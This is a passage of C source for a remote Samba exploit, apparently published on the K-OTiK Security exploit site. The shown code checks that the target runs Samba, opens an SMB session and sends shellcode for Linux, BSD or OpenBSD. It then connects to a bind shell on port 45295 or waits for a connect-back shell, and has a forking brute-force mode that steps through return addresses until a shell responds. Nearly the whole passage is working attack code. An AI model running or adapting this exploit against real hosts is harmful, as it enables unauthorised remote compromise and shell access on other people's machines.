                                                                fprintf(stdout,
                              "+ [%s] Windows\n", scan_ip);
                                                                break;
                                                        default:
                                                                break;  
                                                }

                                                exit(0);
                                                break;
                                        case -1:
                                                fprintf(stderr, "+ fork() error
                              \n");
                                                exit(-1);
                                                break;
                                        default:
                                                if (i > MAX_CHILDS - 2) { 
                                                        wait(&status); 
                                                        i--;
                                                }
                                                break;
                                }
                              }

                              }

                              return 0;
                              }


                              he = gethostbyname(argv[optind]);

                              if (he == NULL) {
                              fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);
                              return -1;
                              }

                              if (brute == -1) {

                              if (ret == 0) ret = targets[type - 1].ret;

                              shellcode = targets[type - 1].shellcode;

                              if (connectback == 1) {
                              fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:452
                              95]\n", 
                                        ip1, ip2, ip3, ip4);

                              switch(targets[type - 1].os_type) {
                                case 0: /* linux */
                                        shellcode = linux_connect_back;
                                        break;
                                case 1: /* FreeBSD/NetBSD */
                                        shellcode = bsd_connect_back;
                                        break;
                                case 2: /* OpenBSD */
                                        shellcode = bsd_connect_back;
                                        break;
                                case 3: /* OpenBSD 3.2 Non-exec stack */
                                        shellcode = bsd_connect_back;
                                        break;
                              }

                              }

                              if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                              fprintf(stderr, "+ socket() error.\n");
                              return -1;
                              }

                              if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                              fprintf(stderr, "+ socket() error.\n");
                              return -1;
                              }

                              memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
                              memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

                              addr1.sin_family = AF_INET;
                              addr1.sin_port   = htons(port); 
                              addr2.sin_family = AF_INET;
                              addr2.sin_port   = htons(45295);

                              if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == 
                              -1) { 
                              fprintf(stderr, "+ connect() error.\n");
                              return -1;
                              }

                              if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].t
                              ype);

                              if (force == 0) {

                              if (is_samba(argv[optind], 2) != 0) {
                                fprintf(stderr, "+ Host is not running samba!\n
                              \n");
                                return -1;
                              }

                              fprintf(stderr, "+ Host is running samba.\n");
                              }

                              if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (
                              char *)inet_ntoa(addr1.sin_addr), port);

                              if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.
                              \n");

                              if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");
                              sleep(5);
                              if (targets[type - 1].os_type != 2) {
                              if (exploit_normal(sock, ret, shellcode) < 0) {
                                fprintf(stderr, "+ Failed.\n");
                                close(sock);
                              }
                              } else {
                              if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                                fprintf(stderr, "+ Failed.\n");
                                close(sock);
                              }
                              }

                              sleep(2);

                              if (connectback == 0) {
                              if(connect(sock2, (struct sockaddr *)&addr2, sizeof(add
                              r2)) == -1) {
                                fprintf(stderr, "+ Exploit failed, try -b to br
                              uteforce.\n");

                                return -1;
                              }

                              fprintf(stdout, "--------------------------------------
                              ------------------------\n");

                              shell(sock2);
                              close(sock);
                              close(sock2);
                              } else {
                              fprintf(stdout, "+ Done...\n");
                              close(sock2);
                              close(sock);
                              }
                              return 0;
                              }

                              signal(SIGPIPE, SIG_IGN);
                              signal(SIGUSR1, handler);

                              switch(brute) {
                              case 0:
                              if (ret == 0) ret = 0xc0000000;
                              shellcode = linux_bindcode;
                              fprintf(stdout, "+ Bruteforce mode. (Linux)\n");
                              break;
                              case 1:
                              if (ret == 0) ret = 0xbfc00000;
                              shellcode = bsd_bindcode;
                              fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\
                              n");
                              break;
                              case 2:
                              if (ret == 0) ret = 0xdfc00000;
                              shellcode = bsd_bindcode;
                              fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and pr
                              ior)\n");
                              break;
                              case 3:
                              if (ret == 0) ret = 0x00170000;
                              shellcode = bsd_bindcode;
                              fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-
                              exec stack)\n");
                              break;
                              }

                              memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
                              memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

                              addr1.sin_family = AF_INET;
                              addr1.sin_port   = htons(port);
                              addr2.sin_family = AF_INET;
                              addr2.sin_port   = htons(45295);

                              for (i = 0; i < 100; i++)
                              childs[i] = -1;
                              i = 0;

                              if (force == 0) {
                              if (is_samba(argv[optind], 2) != 0) {
                              fprintf(stderr, "+ Host is not running samba!\n\n");
                              return -1;
                              }

                              fprintf(stderr, "+ Host is running samba.\n");
                              }

                              while (OWNED == 0) {

                              if (sock  > 2) close(sock);
                              if (sock2 > 2) close(sock2);

                              if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                              if (verbose == 1) fprintf(stderr, "+ socket() error.\n"
                              );
                              }
                              else {  
                              ret -= STEPS;
                              i++;
                              }

                              if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
                              if (verbose == 1) fprintf(stderr, "+ socket() error.\n"
                              );


                              if ((ret & 0xff) == 0x00 && brute != 3) ret++;

                              if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (u
                              nsigned int)ret);

                              usleep(BRUTE_DELAY);

                              switch (childs[i] = fork()) {
                              case 0:
                                if(Connect(sock, (char *)inet_ntoa(addr1.sin_ad
                              dr), port, 2) == -1) {
                                        if (sock  > 2) close(sock);
                                        if (sock2 > 2) close(sock2);
                                        exit(-1);
                                }

                                if(write_timer(sock, 3) == 1) {
                                        if (start_session(sock) < 0) {
                                                if (verbose == 1) fprintf(stder
                              r, "+ Session failed.\n");
                                                if (sock  > 2)close(sock);
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if (brute == 3) {
                                                if (exploit_openbsd32(sock, ret
                              , shellcode) < 0) {
                                                        if (verbose == 1) fprin
                              tf(stderr, "+ Failed.\n");
                                                        if (sock  > 2) close(so
                              ck);
                                                        if (sock2 > 2) close(so
                              ck2);
                                                        exit(-1);
                                                }
                                        } 
                                else {
                                        if (exploit_normal(sock, ret, shellcode
                              ) < 0) {
                                                if (verbose == 1) fprintf(stder
                              r, "+ Failed.\n");
                                                if (sock  > 2) close(sock);
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if (sock > 2) close(sock);

                                        if ((sock2 = socket(AF_INET, SOCK_STREA
                              M, 6)) < 0) {
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if(Connect(sock2, (char *)inet_ntoa(add
                              r1.sin_addr), 45295, 2) != -1) {
                                                if (sock2  > 2) close(sock2);
                                                kill(getppid(), SIGUSR1);
                                        }

                                        exit(1);
                                }


                                exit(0);
                                break;
                              case -1:
                                fprintf(stderr, "+ fork() error\n");
                                exit(-1);
                                break;
                              default:
                                if (i > MAX_CHILDS - 2) {
                                        wait(&status);
                                        i--;
                                }
                                break;
                              }

                              }

                              }

                              return 0;
                              }

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits